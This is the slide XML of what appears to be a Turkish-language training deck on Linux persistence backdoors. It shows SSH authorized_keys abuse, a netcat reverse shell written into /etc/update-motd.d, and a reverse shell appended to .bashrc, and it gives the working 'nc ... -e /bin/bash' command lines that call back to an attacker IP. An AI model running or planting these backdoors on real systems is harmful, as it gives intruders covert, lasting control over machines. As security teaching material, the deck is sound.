              <a:buClr>
                <a:srgbClr val="D1D5DB"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Bu komut, biri özel anahtar (backdoor_ssh) diğeri genel anahtar (backdoor_ssh.pub) olmak üzere 2 anahtar dosyası üretir. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D1D5DB"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>backdoor_ssh.pub dosyasının içeriği </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="434343"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>~/.ssh/authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>  altına kopyalanır. backdoor_ssh dosyası ssh erişimi için kullanılır.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>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4" name="Shape 624"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="625" name="Google Shape;625;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="265850" y="727300"/>
            <a:ext cx="8725476" cy="3890349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Google Shape;626;p80"/>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ssh authorized_keys dosyasının kötüye kullanımı</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p80"/>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1" name="Shape 631"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p8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Backdoor: ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>motd</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Google Shape;633;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="679925"/>
            <a:ext cx="4170600" cy="33759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SSH protokolünü kullanarak bir uzak sunucuya bağlandığınızda karşınıza çıkan bilgi banner'ıdır. </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Bu banner genellikle sistem mesajları, güncel durumlar veya hoş geldiniz mesajları gibi bilgiler içerir.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Mesajlar genellikle /etc/update-motd.d/ dizini altındaki betiklerden oluşturulabilir.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Varsayılan olarak, diğer kullanıcılara bu dizinde yazma izni verilmez.</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Örneğin, kullanıcı bir SSH oturumu başlattığında şu tür bir karşılama mesajı görebilir.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Google Shape;634;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456425" y="679925"/>
            <a:ext cx="4445700" cy="27240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Aşağıdaki komutu kullanarak backdoor adında bir reverse shell betiği oluşturup bunu motd olarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>çalıştırılması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sağlanabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</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Herhangi birisi sisteme ssh ile bağlantı sağladığında aşağıdaki betik tetiklenir ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>192.168.2.103</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> ip adresi ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>9001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> portunda dinleyen sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ldırgan için reverse shell oluşturur. </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Oluşturulan reverse shell saldırgandan aldığı komutları kurbanın ortamında çalıştırır.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="Google Shape;635;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="4189425"/>
            <a:ext cx="4170600" cy="538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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>20.04</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> LTS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="115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50">
                <a:solidFill>
                  <a:srgbClr val="F22C3D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Documentation:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> https://help.ubuntu.com/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Google Shape;636;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480275" y="3455525"/>
            <a:ext cx="4421700" cy="1293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root@kali:# cd /etc/update-motd.d</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br>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>root@kali:/etc/update-motd.d# </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-e </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="D69D85"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'#!/bin/sh\nnc 192.168.2.103 9001 -e /bin/bash &amp;'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; 20-backdoor &amp;&amp; chmod +x 20-backdoor</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1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Google Shape;637;p81"/>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3"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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1" name="Shape 641"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="642" name="Google Shape;642;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="314600" y="666300"/>
            <a:ext cx="8374125" cy="4012350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Google Shape;643;p82"/>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ssh motd dosyasının kötüye kullanımı</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Google Shape;644;p82"/>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48" name="Shape 648"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Google Shape;649;p8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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor: ~bashrc</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="Google Shape;650;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="679925"/>
            <a:ext cx="4170600" cy="3916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.bashrc, Bourne kabuğu veya bilinen adıyla bash tarafından kullanılan başlangıç komut dosyalarından biridir.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Eğer bir kullanıcı giriş kabuğu olarak bash'i kullanıyorsa, bu .bashrc dosyası her etkileşimli oturum başlatıldığında çalıştırılır.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Yandaki resimde, .bashrc dosyama zararlı olmayan bir betik olan echo "I'm triggered" satırını eklendi.</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Ancak, bir saldırgan olarak, buraya reverse shell gibi zararlı bir betik eklenir. </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Bu durumda sisteme birisi giriş yaptığında ilgili betik tetiklenir.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="D1D5DB"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="651" name="Google Shape;651;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-3746" l="-999" r="46399" t="-3595"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480275" y="1517275"/>
            <a:ext cx="4421702" cy="1822650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="434343"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Google Shape;652;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480275" y="679925"/>
            <a:ext cx="4421700" cy="741900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.bashrc, tetikleyen örnek durumlar: Aşağıda bashrc’ye “I`m triggered‘ text eklendi. </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Google Shape;653;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480275" y="4072913"/>
            <a:ext cx="4421700" cy="523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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pinky@pinkys-palace:~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="D69D85"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'nc 192.168.2.103 9001 -e /bin/bash &gt;/dev/null &amp;'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> &gt; .bashrc</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Google Shape;654;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480275" y="3530800"/>
            <a:ext cx="4421700" cy="461700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.bashrc dosyasına reverse shell eklenmesi:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Google Shape;655;p83"/>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9" name="Shape 659"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="660" name="Google Shape;660;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="-1667" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="112125" y="1129564"/>
            <a:ext cx="8838898" cy="2649836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
